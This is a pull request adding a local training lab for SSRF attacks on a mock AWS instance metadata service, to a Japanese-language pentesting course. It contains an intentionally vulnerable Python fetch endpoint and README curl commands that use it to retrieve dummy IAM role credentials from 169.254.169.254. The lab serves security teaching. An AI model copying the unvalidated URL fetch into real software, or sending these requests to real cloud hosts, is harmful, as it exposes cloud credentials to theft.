### PR TITLE
Exercises: add SSRF→IMDS local lab

### DIFF
--- a/exercises/README.md
+++ b/exercises/README.md
@@ -18,7 +18,7 @@ title: "演習環境概要（exercises/）"
 | Part 3：Web Pentest 実践 | `exercises/juice-shop/` / `exercises/dvwa/` / Burp Academy | 提供あり（`juice-shop` / `dvwa`）、Burp Academy は外部 |
 | Part 4：API Pentest と認証／権限管理 | `exercises/crapi/` | 提供あり（`crapi`） |
 | Part 5：モバイル Pentest | MobSF 等を用いた静的解析 | 提供あり（`mobsf`）※解析対象アプリは別途用意 |
-| Part 6：クラウド・インフラ Pentest | `exercises/` 配下に今後追加予定 | 未整備 |
+| Part 6：クラウド・インフラ Pentest | SSRF→IMDS 等をローカル疑似環境で確認 | 提供あり（`ssrf-imds`） |
 | Part 7：総合演習 | 既存の `exercises/` を前提にシナリオ設計 | Part 7 専用は未整備（既存の `dvwa` / `juice-shop` / `crapi` を利用） |
 
 ## ディレクトリ構成（現状）
@@ -31,6 +31,8 @@ title: "演習環境概要（exercises/）"
   API セキュリティ演習用の crAPI を用いた環境。
 - `exercises/mobsf/`  
   MobSF（Mobile Security Framework）を用いたモバイル静的解析の演習環境。
+- `exercises/ssrf-imds/`  
+  SSRF→IMDS の攻撃パスをローカル疑似環境で確認する演習環境。
 
 各ディレクトリには、少なくとも次のファイルを配置する方針とする。
 

--- a/exercises/ssrf-imds/README.md
+++ b/exercises/ssrf-imds/README.md
@@ -1,0 +1,49 @@
+---
+title: "SSRF → IMDS 演習環境（exercises/ssrf-imds）"
+---
+
+# SSRF → IMDS 演習環境（Part 6）
+
+本ディレクトリは、SSRF（Server-Side Request Forgery）を起点として、IMDS（Instance Metadata Service）相当のエンドポイントへ到達しうることを、**ローカルの疑似環境**で確認するための演習環境である。
+
+この環境は「意図的に SSRF が成立する」ように実装されたサンプルアプリを含む。必ずローカル環境（または許可された検証環境）でのみ利用すること。
+
+## 前提
+
+- Docker Engine と `docker compose`（Compose v2）が利用可能であること。
+- 演習はローカル完結で行い、第三者システムへ向けて URL フェッチを試行しないこと。
+
+## 起動
+
+```bash
+cd exercises/ssrf-imds
+docker compose up -d
+```
+
+## 使い方（例）
+
+SSRF サンプルアプリに対して、`url` パラメータで取得先 URL を渡す。
+
+```bash
+curl "http://127.0.0.1:18080/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+```
+
+続けて、ロール名が分かったら、ロールに紐づく認証情報（ダミー）を取得する。
+
+```bash
+curl "http://127.0.0.1:18080/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/example-role"
+```
+
+> 補足：本演習の IMDS はローカルのモックであり、返却される認証情報はダミーである。実環境の認証情報を取得する行為は、事前許可と厳密な統制が必須である。
+
+## 停止
+
+```bash
+cd exercises/ssrf-imds
+docker compose down
+```
+
+## 補足（ネットワーク）
+
+- IMDS の到達先として一般的な `169.254.169.254` を疑似的に再現するため、本演習では Docker ネットワークに `169.254.0.0/16` を利用する。
+- もし利用環境の都合でネットワーク作成に失敗する場合は、`docker-compose.yml` の `subnet` と `ipv4_address` を変更して利用すること。

--- a/exercises/ssrf-imds/docker-compose.yml
+++ b/exercises/ssrf-imds/docker-compose.yml
@@ -1,0 +1,25 @@
+services:
+  ssrf-app:
+    build:
+      context: ./ssrf_app
+    ports:
+      - "127.0.0.1:18080:8080"
+    depends_on:
+      - imds-mock
+    restart: unless-stopped
+    networks:
+      imdsnet: {}
+
+  imds-mock:
+    build:
+      context: ./imds_mock
+    restart: unless-stopped
+    networks:
+      imdsnet:
+        ipv4_address: 169.254.169.254
+
+networks:
+  imdsnet:
+    ipam:
+      config:
+        - subnet: 169.254.0.0/16

--- a/exercises/ssrf-imds/imds_mock/Dockerfile
+++ b/exercises/ssrf-imds/imds_mock/Dockerfile
@@ -1,0 +1,7 @@
+FROM python:3.13-slim-bookworm
+
+WORKDIR /app
+COPY imds.py /app/imds.py
+
+EXPOSE 80
+CMD ["python", "-u", "/app/imds.py"]

--- a/exercises/ssrf-imds/imds_mock/imds.py
+++ b/exercises/ssrf-imds/imds_mock/imds.py
@@ -1,0 +1,66 @@
+import http.server
+import json
+import os
+import urllib.parse
+
+
+ROLE_NAME = os.getenv("IMDS_ROLE_NAME", "example-role")
+
+
+def credential_payload(role_name: str) -> dict:
+    return {
+        "Code": "Success",
+        "LastUpdated": "2026-01-01T00:00:00Z",
+        "Type": "AWS-HMAC",
+        "AccessKeyId": "ASIAEXAMPLEACCESSKEY",
+        "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
+        "Token": "EXAMPLETOKEN",
+        "Expiration": "2026-01-02T00:00:00Z",
+        "RoleArn": f"arn:aws:iam::123456789012:role/{role_name}",
+    }
+
+
+class IMDSHandler(http.server.BaseHTTPRequestHandler):
+    server_version = "imds-mock/0.1"
+
+    def do_GET(self) -> None:
+        parsed = urllib.parse.urlparse(self.path)
+        path = parsed.path
+
+        if path == "/latest/meta-data/iam/security-credentials/":
+            self._send_text(200, f"{ROLE_NAME}\n")
+            return
+
+        if path == f"/latest/meta-data/iam/security-credentials/{ROLE_NAME}":
+            payload = json.dumps(credential_payload(ROLE_NAME), indent=2) + "\n"
+            self._send_json(200, payload)
+            return
+
+        self._send_text(404, "not found\n")
+
+    def log_message(self, format: str, *args) -> None:
+        return
+
+    def _send_text(self, status: int, text: str) -> None:
+        payload = text.encode("utf-8")
+        self.send_response(status)
+        self.send_header("Content-Type", "text/plain; charset=utf-8")
+        self.send_header("Content-Length", str(len(payload)))
+        self.end_headers()
+        self.wfile.write(payload)
+
+    def _send_json(self, status: int, json_text: str) -> None:
+        payload = json_text.encode("utf-8")
+        self.send_response(status)
+        self.send_header("Content-Type", "application/json; charset=utf-8")
+        self.send_header("Content-Length", str(len(payload)))
+        self.end_headers()
+        self.wfile.write(payload)
+
+
+def main() -> None:
+    http.server.ThreadingHTTPServer(("0.0.0.0", 80), IMDSHandler).serve_forever()
+
+
+if __name__ == "__main__":
+    main()

--- a/exercises/ssrf-imds/ssrf_app/Dockerfile
+++ b/exercises/ssrf-imds/ssrf_app/Dockerfile
@@ -1,0 +1,7 @@
+FROM python:3.13-slim-bookworm
+
+WORKDIR /app
+COPY app.py /app/app.py
+
+EXPOSE 8080
+CMD ["python", "-u", "/app/app.py"]

--- a/exercises/ssrf-imds/ssrf_app/app.py
+++ b/exercises/ssrf-imds/ssrf_app/app.py
@@ -1,0 +1,56 @@
+import http.server
+import urllib.parse
+import urllib.request
+
+
+class SSRFHandler(http.server.BaseHTTPRequestHandler):
+    server_version = "ssrf-app/0.1"
+
+    def do_GET(self) -> None:
+        parsed = urllib.parse.urlparse(self.path)
+        if parsed.path != "/fetch":
+            self._send_text(404, "not found\n")
+            return
+
+        query = urllib.parse.parse_qs(parsed.query)
+        url = query.get("url", [None])[0]
+        if not url:
+            self._send_text(400, "missing query parameter: url\n")
+            return
+
+        target = urllib.parse.urlparse(url)
+        if target.scheme not in ("http", "https"):
+            self._send_text(400, "only http/https are allowed\n")
+            return
+
+        try:
+            with urllib.request.urlopen(url, timeout=3) as resp:
+                status = getattr(resp, "status", 200)
+                body = resp.read(1024 * 1024)
+        except Exception as e:
+            self._send_text(502, f"fetch failed: {e}\n")
+            return
+
+        header = f"fetched: {url}\nstatus: {status}\n\n".encode("utf-8")
+        self._send_bytes(200, header + body)
+
+    def log_message(self, format: str, *args) -> None:
+        return
+
+    def _send_text(self, status: int, text: str) -> None:
+        self._send_bytes(status, text.encode("utf-8"))
+
+    def _send_bytes(self, status: int, payload: bytes) -> None:
+        self.send_response(status)
+        self.send_header("Content-Type", "text/plain; charset=utf-8")
+        self.send_header("Content-Length", str(len(payload)))
+        self.end_headers()
+        self.wfile.write(payload)
+
+
+def main() -> None:
+    http.server.ThreadingHTTPServer(("0.0.0.0", 8080), SSRFHandler).serve_forever()
+
+
+if __name__ == "__main__":
+    main()


### PR DESCRIPTION
## 変更概要
- Part6 向けに SSRF→IMDS の攻撃パスをローカル疑似環境で確認できる演習環境を追加（exercises/ssrf-imds）
- exercises/README.md の対応表とディレクトリ一覧を更新

## 目的
- 本文 Part6 の説明（SSRF→IMDS）を、商用クラウドに触れずにローカルで再現・観察できるようにする

## 注意
- 本演習環境は意図的に SSRF が成立する。必ずローカル環境（または許可された検証環境）でのみ利用する

Relates to #23
